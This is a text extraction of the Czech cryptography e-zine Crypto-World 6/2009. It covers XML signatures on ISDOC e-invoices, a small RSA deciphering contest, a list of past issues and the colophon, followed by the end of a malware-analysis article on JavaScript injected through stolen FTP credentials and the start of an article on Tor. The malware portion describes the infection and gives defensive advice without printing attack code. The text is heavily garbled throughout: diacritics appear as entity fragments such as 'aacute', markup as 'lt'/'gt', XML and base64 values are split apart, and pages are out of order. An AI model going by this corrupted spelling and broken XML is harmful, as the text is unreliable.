naacutesledně aplikovaacuten elektronickyacute podpis zvolenou metodou v drtiveacute většině se použiacutevaacute algoritmus RSA a vyacutesledek je uložen do elementu ltSignatureValuegt Aby přiacutejemce měl vždy po ruce veřejnyacute kliacuteč podepisujiacuteciacute osoby je jako třetiacute element přidaacutena binaacuterniacute reprezentace jeho certifikaacutetu a to do jednoho z podelementů elementu ltKeyInfogt

Poznaacutemka od 112010 je podle světovyacutech doporučeniacute zapovězeno v systeacutemech veřejneacute spraacutevy v ČR použiacutevaacuteniacute digitaacutelniacutech otisků algoritmem SHA1 a je nutno přejiacutet na některyacute vyššiacute algoritmus z rodiny SHA2 napřiacuteklad SHA256 Pracovniacute skupina SPIS na tomto probleacutemu aktuaacutelně pracuje

Konkreacutetniacute provedeniacute podpisu v XML souboru faktury by mohlo po určiteacutem zjednodušeniacute a naformaacutetovaacuteniacute vypadat např takto

ltxml version=10 encoding=utf-8gt ltInvoice xmlns=httpisdoccznamespaceinvoice version=51gt lt--helliphelliphelliphelliphelliphellip--gt ltmdashpoložky dokumentu faktura--gt lt--helliphelliphelliphelliphelliphellip--gt ltPaymentMeansgt ltmdashposledni element nepodepsane faktury- --gt ltPaymentMeansgt

Crypto-World 62009

17

ltSignature xmlns=httpwwww3org200009xmldsi ggt ltSignedInfogt

ltCanonicalizationMethod Algorithm=httpwwww3or gTR2001REC-xml- c14n-20010315gt ltSignatureMethod Algorithm=httpwwww3org2000 09xmldsigrsa- sha1gt

ltReference URI=gt ltTransformsgt

ltTransform Algorithm=httpwwww3org200009xml dsigenveloped-signaturegt

ltTransformsgt ltDigestMethod Algorithm=httpwwww3org2000 09xmldsigsha1gt ltDigestValuegt29hg161shG5T0cuwyUEQZiHmn4=ltDiges tValuegt ltReferencegt ltSignedInfogt ltSignatureValuegtrJgOKTSyaGb5 atd==ltSignatureVa luegt ltKeyInfogt ltX509Datagt ltX509CertificategtMIIEVCCAz+gAKoZIhvcNAQAwaDELmak GA1UEBhMCQ1ox hellip vlastni klientskyacute certifikaacutet hellip qoF4Y1IgJ0w16ws= ltX509Certificategt ltX509Datagt ltKeyInfogt ltSignaturegt ltInvoicegt

Podpora formaacutetu v jednotlivyacutech ISERP V době psaniacute tohoto člaacutenku (červen 2009) ještě neniacute možneacute hodnotit uacuteroveň implementace v jednotlivyacutech IS protože většina vyacuterobců jiacute plaacutenuje až do podzimniacutech nebo zimniacutech legislativniacutech verziacute Nepochybně bude velmi zajiacutemaveacute porovnat jak jednotliviacute vyacuterobci k implementaci formaacutetu ISDOC ve svyacutech systeacutemech přistoupili Ať to ale provedou tak či onak důležiteacute je že fakturu nebude v systeacutemu přiacutejemce třeba znovu typovat a že položky budou automaticky (nebo alespoň poloautomaticky) rozeznaacuteny V tom se skryacutevaacute siacutela celeacuteho řešeniacute na straně přiacutejemce

Podpora formaacutetu externiacutemi naacutestroji Pro uacutečely podpory průmysloveacuteho nasazeniacute formaacutetu ISDOC již existujiacute i externiacute naacutestroje Jeden z nich vyvinula firma ABRA Software a pojmenovala jej ISDOCReader Jde o freeware tj program kteryacute je možneacute kdykoliv staacutehnout z přiacuteslušneacute adresy (wwwisdocorg) a začiacutet jej volně použiacutevat Tento naacutestroj provede po instalaci asociaci s oběma variantami formaacutetu ISDOC (isdoc i isdocx) a stane se tak vyacutechoziacutem prohliacutežečem tohoto formaacutetu ISDOCReader dovoluje libovolnyacute fakturačniacute doklad zobrazit do vizuaacutelniacute podoby faktury ověřit přiacuteslušnyacutem tlačiacutetkem elektronickyacute podpis dokladu přiacutepadně si doklad i vytisknout Je takeacute možneacute prohliacutežet a exportovat přiacutepadneacute přiacutelohy faktury Dalšiacutem krokem bdquoworkflowldquo zpracovaacuteniacute došleacute elektronickeacute faktury v menšiacute firmě je pak jejiacute postoupeniacute k automatickeacutemu či poloautomatickeacutemu zpracovaacuteniacute do ISERP přiacutejemce k čemuž je opět přiacuteslušneacute tlačiacutetko Technicky bude možnost odeslaacuteniacute dokladu do libovolneacuteho ISERP vyřešena pomociacute konfiguračniacuteho souboru kteryacute si každyacute vyacuterobce bude moci daacutet do sveacute instalace a kteryacute ISDOCReader bude volat

Crypto-World 62009

18

Přiacuteklad použitiacute freewaroveacuteho naacutestroje ISDOCReader na ověřeniacute elpodpisu

Pokud se některyacute z laskavyacutech čtenaacuteřů bude zajiacutemat o projekt ISDOC podrobněji dalšiacute informace včetně posledniacute verze formaacutetu dokumentace jeho datovyacutech struktur přiacutekladů datovyacutech souborů i aktuaacutelniacutech uacutedajů o podpoře formaacutetu jednotlivyacutemi vyacuterobci software nalezne na adrese wwwisdoccz Literatura

[1] Kolektiv autorů Dokumentace ke standardu UBL 20 [online] Dostupnyacute z WWW lthttpdocsoasis-openorgublcs-UBL-20UBL-20htmlgt

[2] Kosek Jiřiacute XML scheacutemata [online] Dostupnyacute z WWW lthttpwwwkosekczxmlschemawxshtmlgt

[3] Kolektiv autorů XSD Schema tutorial [online] Dostupnyacute z WWW lthttpwwww3schoolscomschemadefaultaspgt

[4] Kolektiv autorů sdruženiacute W3c Dokumentace ke Xmldsig [online] Dostupnyacute z WWW lthttpwwww3orgTRxmldsig-coregt

[5] Kolektiv autorů Pracovniacute skupiny pro elektronickou fakturaci SPIS Dokumentace k formaacutetu ISDOC [online] Dostupnyacute z WWW lthttpwwwisdocczgt

Crypto-World 62009

19

D Malaacute soutěž v luštěniacute RSA Pavel Vondruška (pavelvondruskacrypto-worldinfo)

Pro přiacuteznivce našich podzimniacutech soutěžiacute v luštěniacute ale samozřejmě i dalšiacute čtenaacuteře jsem připravil naacutesledujiacuteciacute drobnou uacutelohu Soutěžniacutem uacutekolem je rozluštěniacute šifroveacuteho textu 14 39 07 57 18 34 10 47 17 92 06 31 28 65 32 92 11 41 26 31 26 29 20 80 25 06 00 77 03 60 09 00 03 60 11 44 31 00 05 41 07 92 06 16 04 70 10 75 03 60 18 79 00 46 26 73 23 49 25 18 13 90 K zašifrovaacuteniacute otevřeneacuteho textu byl použit algoritmus RSA a formaacutetovaacuteniacute CW10 (detaily viz naacutepověda) veřejnyacute kliacuteč je (Ne)=(3337 79)

Při luštěniacute se řešitel seznaacutemiacute s algoritmem RSA a uvědomiacute si jak uacutezce souvisiacute bezpečnost algoritmu s modulem N Pro prveacute dva řešitele je připravena odměna V přiacutepadě zaacutejmu se mohou bezplatně zuacutečastnit kurzu Problematika infrastruktury veřejnyacutech kliacutečů (PKI)ldquo kterou 2562009 pořaacutedaacute akademie CZNIC (httpwwwnicczakademiecourse15detail) Lektorem kurzu je PVondruška Svaacute řešeniacute zasiacutelejte na adresu pavelvondruskacrypto-worldinfo Řešeniacute uacutelohy a jmeacutena všech uacutespěšnyacutech luštitelů budou zveřejněna v letniacutem dvojčiacutesle e-zinu Crypto-World 7-82009 kteryacute vyjde 182009 Z tohoto důvodu společně s řešeniacutem zašlete souhlas se zveřejněniacutem sveacuteho jmeacutena resp nickpseudonym kteryacute může byacutet miacutesto něj zveřejněn Přeji pěknou zaacutebavu

Doplňujiacuteciacute informace k soutěžniacute uacuteloze

1 Použityacute šifrovaciacute algoritmus

V podstatě se jednaacute o klasickyacute šifrovaciacute algoritmus založenyacute na RSA kde však otevřenyacute text neniacute formaacutetovaacuten podle PKCS 1 (verze 152021) ale podle naacutemi zadanyacutech pravidel kteraacute označiacuteme jako CW 10 2 Asymetrickyacute algoritmus RSA

Zvoliacuteme prvočiacutesla p a q a vypočteme N = pq

Φ(N) = (p-1)(q-1)

Daacutele zvoliacuteme naacutehodneacute čiacuteslo e kde

Crypto-World 62009

20

1 lt e lt Φ(N) takoveacute že e a Φ(N) jsou nesoudělnaacute

Vypočteme čiacuteslo d takoveacute že

1 lt d lt Φ(N) a

ed equiv 1 mod Φ(N)

Dvojici (Nd) nazveme soukromyacute kliacuteč a (Ne) veřejnyacute kliacuteč

3 Formaacutetovaacuteniacute zpraacutevy (CW10)

Zpraacutevu M překoacutedujeme nejprve do čiacuteselneacuteho tvaru K tomu použijeme některou vhodnou převodovou tabulku Např tuto tabulku

0 1 2 3 4 5 6 7 8 9 6 0 Mezera 2 3 4 A B C D E 7 F G H I J K L M N O 8 P Q R S T U V W X Y 9 Z 1 2 3 4 5 6 7 8 9 Zpraacutevu M pak zformaacutetujeme do posloupnosti čiacutesel pevneacute deacutelky (deacutelka bude rovna deacutelce modulu N) K tomu použijeme vlastniacute formaacutetovaacuteniacute kteraacute pracovně nazveme CW10 Formaacutetovaacuteniacute CW10 1) Maacute-li modul deacutelku k budeme zpraacutevu převedenou podle tabulky dělit na skupiny deacutelky k-1 2) Všechny skupiny musiacute miacutet deacutelku k-1 nemaacute-li proto posledniacute skupina tuto deacutelku doplniacuteme

ji zprava přiacuteslušnyacutem počtem nul 3) Všechny ziacuteskaneacute skupiny nyniacute doplniacuteme zleva jednou nulou Deacutelka každeacute skupiny je po

těchto uacutepravaacutech rovna k 4) Vyacutesledek po šifrovaacuteniacute maacute deacutelku rovnou maximaacutelně k nemaacute-li ji doplniacuteme vyacutesledek zleva

nulami Ziacuteskanyacute vyacutesledek po formaacutetovaacuteniacute M označme M= m1 m2 m3 hellip 4 Zašifrovaacuteniacute zpraacutevy M

Zašifrovaacuteniacutem zpraacutevy M pomociacute veřejneacuteho kliacuteče (Ne) rozumiacuteme řetězec

P = C1 C2 C3 kde

C1 equiv m1e mod N C2 equiv m2

e mod N C3 equiv m3e mod N Ci equiv mi

e mod N

5 Dešifrovaacuteniacute zpraacutevy P

Dešifrovaacuteniacute zpraacutevy P se pak provede tak že použijeme soukromyacute exponent d a tiacutem ziacuteskaacuteme původniacute zpraacutevu M

m1 equiv C1d mod N m2 equiv C2

d mod N m3 equiv C3d mod N mi equiv Cid mod N

6 Bezpečnost Pokud dokaacuteže přiacutejemce udržet svůj soukromyacute kliacuteč v tajnosti (a čiacutesla p a q byla dostatečně velkaacute) pak je ze znalosti šifroveacute zpraacutevy a veřejneacuteho kliacuteče vyacutepočetně složiteacute ziacuteskat otevřenou zpraacutevu

Crypto-World 62009

21

E O čem jsme psali v červnu 2000 ndash 2008 Crypto-World 62000 A Novaacute evropskaacute iniciativa v oblasti kryptografie (JPinkava) 2 B Fermatův test primality Carmichaelova čiacutesla bezčtvercovaacute čiacutesla (PVondruška)3 -5 C Červ LOVE-LETTER-FOR-YOUTXTVBS (PVondruška) 6-8 D EUROCRYPT 2000 (PVondruška) 9-11 E Code Talkers (IIIdiacutel) (PVondruška) 12-14 F Letem šifrovyacutem světem 15 G Zaacutevěrečneacute informace 16 Přiacuteloha Navajo Code Talkers revize z 1561945 soubor Dictionaryhtm

Crypto-World 62001 A Zaacutehadnaacute paacuteska z Prahy IIdiacutel (PVondruška JJanečko) 2- 6 B Radioaktivniacute rozpad a kryptografickeacute kliacuteče (LSmoliacutek) 7-9 C Kryptografie a normy diacutel 8 - Normy IETF - SMIME (J Pinkava) 10-13 D Počiacutetačovyacute kurs Lidovyacutech novin (PVondruška) 14-15 E Security and Protection of Information (D Cvrček) 16 F Praacutevniacute odpovědnost poskytovatelů (JMatejka) 17-23 G Ukončeniacute platnosti zneplatněniacute (a zrušeniacute) certifikaacutetu IIdiacutel (JProkeš) 24-25 H Letem šifrovyacutem světem 26-27 I Zaacutevěrečneacute informace 28 Přiacuteloha priloha6zip (fotografie Security 2001 teacutemata přednaacutešek na konferenci Eurocryptacute2001)

Crypto-World 62002 A Historie a statistika Crypto-Worldu (PVondruška) 2-4 B Digitaacutelniacute certifikaacutety IETF-PKIX čaacutest 4 (JPinkava) 5-8 C Bezpečnost informačniacuteho systeacutemu pro certifikačniacute služby (ISCS)

a objektovaacute bezpečnost (PVondruška) 9-16 D Informace - Cryptology ePrint Archive (VKliacutema) 17 E Letem šifrovyacutem světem 18-19

1 Kritika člaacutenku Je 1024-bitovaacute deacutelka kliacuteče RSA dostatečnaacute (Crypto-World 52002)

2 Zaacutekon o elektronickeacutem podpisu novelizovaacuten - Zaacutekon č 2262002 Sb 3 Hackeři pomozte 4 O čem jsme psali v červnu 2000 a 2001

F Zaacutevěrečneacute informace 20

Crypto-World 62003 A Nebezpečiacute internetovyacutech řešeniacute (MKuchař) 2-6 B Digitaacutelniacute certifikaacutety IETF-PKIX čaacutest 13

Atributoveacute certifikaacutety ndash diacutel 2 (JPinkava) 7-10 C Kryptografickeacute protokoly s nulovyacutem předaacuteniacutem znalostiacute(JPinkava) 11-12 D Elektronickeacute peniacuteze (PVondruška) 13-20 E Letem šifrovyacutem světem 21-23 F Zaacutevěrečneacute informace 24

Crypto-World 62009

22

Crypto-World 62004 A Měsiacutec prvočiacutesel (PVondruška) 2-5 B Statistickyacute rozbor největšiacuteho prvočiacutesla (PTesař) 6-7 C Program STORK - vstupniacute dokumenty přiacuteprava (E-CRYPT) čaacutest 2 (JPinkava) 8-16 D Letem šifrovyacutem světem 17-18 E Zaacutevěrečneacute informace 19

Crypto-World 62005 A Informace pro čtenaacuteře a autory (PVondruška) 2-3 B Kontrola certifikačniacute cesty čaacutest 1 (P Rybaacuter) 4-11 C O neziacuteskateľnosti rodneacuteho čiacutesla z jeho hashu (M Pivoluska) 12-13 D Přehledovaacute zpraacuteva o vyacuteznamnyacutech publikaciacutech a projektech na teacutema

poskytovaacuteniacute anonymity klasifikace a měřitelnost informačniacuteho soukromiacute (privacy) čaacutest 2 (M Kumpošt) 14-17

E Kryptografickeacute eskalačniacute protokoly čaacutest 1 (J Krhovjaacutek) 18-21 F Recenze knihy Jon Erickson Hacking - uměniacute exploitace 22 G O čem jsme psali v červnu 2000-2004 23 H Zaacutevěrečneacute informace 24

Crypto-World 62006 A PKI roaming (L Dostaacutelek) 2-4 B Vyhlaacuteška o podrobnostech atestačniacuteho řiacutezeniacute pro elektronickeacute naacutestroje

a lehkyacute uacutevod do časoveacute synchronizace (P Vondruška) 5-9 C Univerzaacutelniacute posilovače hašovaciacutech funkciacute včetně MD5 a SHA1

aneb zaacutechranneacute kolo pro zoufalce (V Kliacutema) 10-14 D NIST (National Institute of Standards and Technology - USA) a kryptografie Recommendation on Key Management ndash čaacutest 2

(J Pinkava) 15-18 E O čem jsme psali v červnu 1999-2005 19-20 F Zaacutevěrečneacute informace 21

Crypto-World 62007 A Přehled a historie polyalfabetickyacutech šifer (PVondruška) 2-11 B Matematizace komplexniacute bezpečnosti v ČR čaacutest I (JHrubyacute) 12-20 C Mikulaacutešskaacute kryptobesiacutedka Call for Papers 21 D O čem jsme psali v červnu 2000-2006 22-23 E Zaacutevěrečneacute informace 24 Přiacuteloha Mikulaacutešskaacute kryptobesiacutedka (6-7122007)- MKB2007_CallForPapers_cervenpdf

Crypto-World 62008 A RFID Co to vlastně maacuteme v kapse (MHlavaacuteč TRosa) 2 - 17 B Bezpečnost PHP aplikaciacute (JVraacutena) 18 - 22 C Popis šifrovaciacuteho algoritmu Serpent (JJeřaacutebek) 24 - 29 D O čem jsme psali v červnu 2000-2007 30 ndash 31 E Zaacutevěrečneacute informace 32

Crypto-World 62009

23

F Zaacutevěrečneacute informace 1 Sešit Crypto-World je oficiaacutelniacute informačniacute sešit Kryptologickeacute sekce Jednoty českyacutech matematiků a fyziků (GCUCMP) Obsahuje člaacutenky podepsaneacute autory Přiacutepadneacute chyby a nepřesnosti jsou diacutelem PVondrušky a autorů jednotlivyacutech podepsanyacutech člaacutenků GCUCMP za ně nemaacute odbornou ani jinou zodpovědnost Adresa URL na niacutež můžete najiacutet tento sešit (zpravidla 3 tyacutedny po jeho rozeslaacuteniacute) a předchoziacute sešity GCUCMP denně aktualizovaneacute novinky z kryptologie a informačniacute bezpečnosti normy standardy straacutenky některyacutech členů a dalšiacute souvisejiacuteciacute materiaacutely httpcrypto-worldinfo 2 Registrace zrušeniacute registrace Zaacutejemci o e-zin se mohou zaregistrovat pomociacute e-mailu na adrese pavelvondruskacrypto-worldinfo (předmět Crypto-World) nebo použiacutet k odeslaacuteniacute žaacutedosti o registraci elektronickyacute formulaacuteř na httpcrypto-worldinfo Při registraci vyžadujeme pouze jmeacuteno a přiacutejmeniacute titul pracoviště (neniacute podmiacutenkou) a e-mail adresu určenou k zasiacutelaacuteniacute koacutedů ke staženiacute sešitu Ke zrušeniacute registrace stačiacute zaslat kraacutetkou zpraacutevu na e-mail pavelvondruskacrypto-worldinfo (předmět rušiacutem odběr Crypto-Worldu) nebo opět použiacutet formulaacuteř na httpcrypto-worldinfo Ve zpraacutevě prosiacutem uveďte jmeacuteno a přiacutejmeniacute a e-mail adresu na kterou byly koacutedy zasiacutelaacuteny 3 Redakce

E-zin Crypto-World Redakčniacute praacutece Pavel Vondruška Staacuteliacute přispěvateleacute Pavel Vondruška Jaroslav Pinkava Jazykovaacute uacuteprava Jakub Vraacutena Přehled autorů httpcrypto-worldinfoobsahautoripdf NEWS Vlastimil Kliacutema (vyacuteběr přiacutespěvků Jaroslav Pinkava komentaacuteře a Tomaacuteš Rosa vklaacutedaacuteniacute na web) Pavel Vondruška Webmaster Pavel Vondruška jr 4 Spojeniacute (abecedně) redakce e-zinu ezincrypto-worldinfo httpcrypto-worldinfo Vlastimil Kliacutema vklimavolnycz httpcryptographyhyperlinkcz Jaroslav Pinkava JaroslavPinkavazonercz httpcrypto-worldinfopinkava Tomaacuteš Rosa t_rosavolnycz httpcryptohyperlinkcz Pavel Vondruška pavelvondruskacrypto-worldinfo httpcrypto-worldinfovondruskaindexphp Pavel Vondruškajr pavelcrypto-worldinfo httpwebdesigncrypto-worldinfo Jakub Vraacutena jakubvranacz httpwwwvranacz

Page 5: Sešit 6/2009 (452 kB)

Crypto-World 62009

5

Vyacutepis z whois pro IP adresu 21211718534 inetnum 2121171850 - 212117185255 netname RUSTELEKOM descr Rustelekom LLC country RU Analyacuteza malware Pokud fqwerzcnqqcn otevřete pak se Vaacutem do počiacutetače staacutehne vcelku slušneacute množstviacute havěti Zajiacutemaveacute na straacutence uacutetočniacuteka je že je zde implementovaacuten mechanizmus sledovaacuteniacute kdo jakeacute přiacutekazy posiacutelaacute a zdaacute se že maacute oběť dva pokusy na ziacuteskaacuteniacute infekce Poteacute dojde na nějakyacute čas k zablokovaacuteniacute pravděpodobně IP adresy Je možneacute že se takto uacutetočniacutek braacuteniacute analyacuteze provozu nebo se pouze snažiacute šetřit siacuteťovyacute provoz Bohužel toto velmi znesnadňuje analyacutezu a opakovaacuteniacute pokusu Po otevřeniacute ve virtuaacutelniacute laboratoři stouplo vytiacuteženiacute procesoru laboratoře na 100 a do dvou minut laboratoř havarovala se zobrazeniacutem modreacuteho šetřiče obrazovky Poteacute jsem již stanici nespouštěl do Windows ale provedl jsem boot do dřiacuteve volně dostupneacuteho naacutestroje pro forenzniacute analyacutezu ndash Helix CD Vytvořil jsem MD5 hash (odborniacuteci prominou) všech souborů na disku a dal se do zjišťovaacuteniacute změn porovnaacuteniacutem originaacutelniacutech souborů se změněnyacutemi Každyacute zjištěnyacute přidanyacute nebo změněnyacute soubor jsem nahraacutel na virustotalcom abych zjistil jak se k němu postaviacute jednotliveacute antiviroveacute systeacutemy Vyacutesledky jsou vcelku zajiacutemaveacute doporučuji je shleacutednout v [13] přiacuteloze 4 ndash bdquoVyacutesledky antivirovyacutech kontrolldquo

Zdroj infekce

V okamžiku kdy bylo zjištěno co danyacute javascript znamenaacute pustili jsme se s Kubou do zjištěniacute kde se vlastně na straacutenkaacutech objevil a odkud Podařilo se naacutem kontaktovat administraacutetora a ziacuteskat logy z web serveru V logu přiacutestupů jsme objevili mnoho zaacuteznamů o přihlaacutešeniacute na FTP z adres z Čiacuteny Zajiacutemavyacutem zjištěniacutem bylo že jsme našli pouze uacutespěšnaacute přihlaacutešeniacute čili uacutetočniacutek odněkud ziacuteskal platneacute uživatelskeacute jmeacuteno a heslo Paacutetrali jsme zdali existuje vir kteryacute krade hesla do FTP a našli jsme jich několik Předpoklaacutedaacuteme že počiacutetač administraacutetora straacutenek byl dřiacuteve infikovaacuten virem jehož ciacutelem bylo ziacuteskat přiacutestupy na FTP uacutečty ndash napřiacuteklad viry Virut nebo Neosploit Bohužel paacutetrat zpětně v čase jakyacute vir byl na stanici několik měsiacuteců zpět nepřineslo žaacutednyacute vyacutesledek

Poteacute jsme takeacute zjišťovali co se změnilo na FTP uacutečtu a našli jsme že pro danou domeacutenu byl do každeacuteho existujiacuteciacuteho php a js souboru vložen škodlivyacute javascript

Zaacutevěr

Po prohleacutednutiacute exploitů bych doporučil na klientskyacutech počiacutetačiacutech miacutet staacutele aktualizovaneacute Windows použiacutevat firewall zajistit nainstalovanyacute a aktuaacutelniacute antivirovyacute systeacutem s aktuaacutelniacute antivirovou databaacuteziacute při pohybu po internetu použiacutevat prohliacutežeč Firefox s nainstalovanyacutem NoScript pluginem Takteacutež bych nedoporučoval použiacutevaacuteniacute automaticky funkci pamatovaacuteniacute hesel miacutesto toho by bylo vhodneacute použiacutet password managery jako je napřiacuteklad Keepass

Crypto-World 62009

6

Z pohledu administraacutetora serveru by bylo vhodneacute aby klienti přestali použiacutevat FTP protokol pro update straacutenek a tento nahraacuteli SCP nebo FTPS Přiacutestup na server by měl byacutet omezen pouze pro nezbytně nutnyacute rozsah IP adres Rozsahy IP adres pouze pro Českou Republiku a Slovensko Kuba zveřejnil na sveacutem blogu [12] Administraacutetoři by si takteacutež měli zajistit vynuceniacute změny FTP hesla po přibližně 90-ti dnech

Odkazy

[1] Obfuscation - httpenwikipediaorgwikiObfuscated_code [2] Sandbox analyacuteza javascriptu umiacutestěneacuteho ve straacutence httpwepawetiseclaborgviewphphash=63e61b9084ca87248668eb83c9aa5742amptype=js [3] Referenčniacute přiacuteručka Javascript ndash httpsdevelopermozillaorgenCore_JavaScript_15_Reference [4] Analyacuteza javascriptů na Internet Storm Center ndash httpiscsansorgdiaryhtmlstoryid=4246 httpiscsansorgtaghtmltag=javascript [5] Microsoft Script Editor guide - httperikeaenetarchives20050704214950 [6] Českeacute a Slovenskeacute rozsahy IP adres httpwwwdrupalczblogjakub-suchyip-adresy-statu-cz-sk-rozsahy [7] Dancho Danchevs blog - httpddanchevblogspotcom [8] Informace o Neosploit httpsecurityworldczsecurityworldutocnici-ziskali-pristup-k-200-000-serverum-a-nasadili-zde-neosploit-280 [9] Neosploit - přiacutepad z Českeacute Republiky httpwwwbenczczaktualitynas-web-byl-napaden-hackerem [10] Test souborů na vyacuteskyt virů ndash httpvirustotalcom [11] Helix3 tm ndash dřiacuteve dostupnyacute na httpwwwe-fensecom [12] Suchyacute J httpwwwdrupalczblogjakub-suchyip-adresy-statu-cz-sk-rozsahy [13] Vorliacuteček J Suchyacute J Vyacuteprava za obsahem javascriptu

přiacuteloha k e-zinu Crypto-World 62009 Přiacuteloha 1 - bdquoVloženyacute Javascript ndash koacuted ve straacutenceldquo str1-6 Přiacuteloha 2 - bdquoVloženyacute Javascript ndash zdrojovyacute koacutedldquo str7-9 Přiacuteloha 3 - bdquoVloženyacute Javascript ndash škodlivyacute koacutedldquo str10-11 Přiacuteloha 4 - bdquoVyacutesledky antivirovyacutech kontrolldquo str12-24

Crypto-World 62009

7

B Anonymita v globaacutelniacute siacuteti Ing Jan Hajnyacute Uacutestav telekomunikaciacute FEKT VUT Brno (hajnyfeecvutbrcz) Abstrakt ndash Hlavniacutem ciacutelem tohoto člaacutenku je popsat současnyacute stav tyacutekajiacuteciacute se ochrany privaacutetniacutech dat při použiacutevaacuteniacute informačniacutech systeacutemů a identifikovat zaacutekladniacute prostředky pro jejich ochranu V prvniacute čaacutesti jsou zmiacuteněny hlavniacute probleacutemy při využiacutevaacuteniacute současnyacutech informačniacutech technologiiacute a hrozby ktereacute naacutem mohou přineacutest Druhaacute čaacutest člaacutenku se věnuje jednomu z prvniacutech kroků při ochraně anonymity v počiacutetačovyacutech siacutetiacutech Jednaacute se o technologii Tor poskytujiacuteciacute možnost skrytiacute identity Osobniacute data a jejich využiacutevaacuteniacute

V současneacute době již plně žijeme v informačniacute společnosti tedy společnosti založeneacute na datech a jejich přenosu zpracovaacuteniacute Teacuteměř každyacute z naacutes využiacutevaacute osobniacute počiacutetač mobilniacute telefon kreditniacute karty či smart karty pro identifikaci v různyacutech organizaciacutech a uacuteřadech Neniacute však zcela zřejmeacute jakaacute data se ve skutečnosti pomociacute těchto přiacutestrojů přenaacutešiacute a kolik mohou řiacuteci o našem chovaacuteniacute a soukromiacute Nejsou to takeacute pouze zařiacutezeniacute kteraacute vlastniacuteme a kteraacute tak můžeme přiacutemo ovlivnit Jednaacute se i o tzv bezpečnostniacute zařiacutezeniacute všude kde se pohybujeme ndash např dohledoveacute kamery ve městech skenery na letišti biometrickeacute pasy nebo různeacute slevoveacute karty obchodniacutech řetězců Všechny tyto zařiacutezeniacute mohou pracovat s našiacute identitou a my nejsme schopni přiacuteliš ovlivnit kolik informaciacute o naacutes uvolňujiacute Mnoho přiacutekladů může byacutet uvedeno např ze člaacutenků Bruce Schneiera kteryacute se problematikou ochrany identity zabyacutevaacute Ze člaacutenku zabyacutevajiacuteciacuteho se problematikou privaacutetniacutech dat [1] je jasneacute že se nejednaacute pouze o teoretickou hrozbu Přiacutekladem mohou byacutet dohledoveacute systeacutemy Jen v Londyacuteně je v současneacute době okolo 500000 dohledovyacutech kamer [2] I přesto z některyacutech vyacutezkumů vyplyacutevaacute [3] že jejich efektivita neniacute při odhalovaacuteniacute zločinů přiacuteliš vysokaacute Zatiacutemco mohou miacutet menšiacute vliv na přesunutiacute zločinnosti na jinaacute miacutesta v globaacutelnějšiacutem měřiacutetku se neprojeviacute Na druhou stranu jsou tyto systeacutemy v provozu 24 hodin denně a sniacutemajiacute všechny osoby na veřejnyacutech miacutestech S technologickyacutem vyacutevojem nejsme daleko od automatickeacuteho rozpoznaacutevaacuteniacute tvaacuteřiacute a tedy i identifikace osob na zaacuteznamech Budou o naacutes tedy znaacutema data tyacutekajiacuteciacute se našeho pohybu během dne chovaacuteniacute (např kde nakupujeme) a dokonce bude možneacute kamery zneužiacutet k ilegaacutelniacutemu sledovaacuteniacute osob v soukromyacutech bytech atd ktereacute jsou v dosahu kamer Stejně tak znaacuteme leteckeacute fotografie sloužiacuteciacute jako podklady k mapaacutem ndash dostatečně detailniacute na odhaleniacute mnoha informaciacute o soukromyacutech osobaacutech

Dalšiacutem přiacutekladem ohroženiacute identity jsou smart karty a jejich využiacutevaacuteniacute během běžneacute denniacute činnosti Neniacute složiteacute si uvědomit že někde musiacute existovat data o tom co během dne jiacuteme (zaměstnaneckeacute ID karty) nakupujeme v obchodech (kreditniacute karty) jakeacute maacuteme zvyky při naacutekupech např potravin (slevoveacutečlenskeacute karty) nebo o co se zajiacutemaacuteme (videopůjčovnyknihovny) Ve všech těchto přiacutepadech je jednoznačně spojena naše identita s našiacutem chovaacuteniacutem Vytvaacuteřiacute se tak jakyacutesi datovyacute otisk našiacute osobnosti i přesto že tyto data jsou rozprostřena u různyacutech organizaciacute a na různyacutech miacutestech

V některyacutech přiacutepadech dokonce můžeme uacutespěšně tvrdit že data o naacutes velice uacutezce ovlivňujiacute naše životy [4] Na zaacutekladě těchto informaciacute mohou instituce rozhodovat o tom zda dostaneme půjčku v bance zda dostaneme viacutezum do zahraničiacute či zda jsme dostatečně důvěryhodniacute pro sděleniacute tajnyacutech informaciacute Nepřiacutejemnyacutem faktem je že sděleniacute těchto dat si nijak neuvědomujeme a nemůžeme je tiacutem nijak ovlivnit stejně tak jako nemůžeme ovlivnit chyby ktereacute se můžou v těchto datech vyskytnout Jednoduše proto že ani neviacuteme kde jsou v současneacute době data uložena Jelikož se jednaacute o cenneacute informace jsou často prostředkem

Crypto-World 62009

8

obchodu např reklamniacutech agentur To je zřetelneacute při využiacutevaacuteniacute služeb jako je veřejnyacute email internetoveacute obchody vyhledaacutevaciacute naacutestroje či komunikačniacute naacutestroje (Facebook atd) kde je reklama zcela ciacutelenaacute podle toho jak danou službu využiacutevaacuteme Tato reklama je pak takeacute mnohem uacutečinnějšiacute tiacutem paacutedem jsou jejiacute zadavateleacute ochotni platit značneacute sumy za data o uživateliacutech

Jak bylo uvedeno u přiacutekladů z předchoziacuteho textu existuje při použiacutevaacuteniacute informačniacutech technologiiacute přiacuteliš hrozeb na to aby zůstala naše identita skryta Tato digitaacutelniacute identita je pak využiacutevaacutena při aktivitaacutech ktereacute již nemusiacute byacutet zcela v zaacutejmu uživatele Probleacutem je že v teacuteto faacutezi je teacuteměř nemožneacute takoveacuteto užiacutevaacuteniacute dat omezit či kontrolovat Důvodem neniacute až tak technologickaacute nemožnost jako neochota poskytovatelů těchto služeb umožňovat anonymnějšiacute prostřediacute V naacutesledujiacuteciacutem textu bude představen naacutestroj kteryacute může řešit prvotniacute probleacutem tyacutekajiacuteciacute se analyacutezy provozu v datovyacutech siacutetiacutech Je zde uveden jelikož se jednaacute o stavebniacute prvek využitelnyacute při uvedeniacute dalšiacutech technik ochrany anonymity uživatele v celosvětoveacute siacuteti a o prvek bez ktereacuteho by pokročilejšiacute techniky ztraacutecely smysl Adresace v IP siacutetiacutech

Prvniacute probleacutem kteryacute potřebujeme vyřešit v souvislosti se zvyacutešeniacutem anonymity v IP siacutetiacutech je adresace a směrovaacuteniacute Všechna posiacutelanaacute data jsou zapouzdřena do IP paketů viz Obr č 1

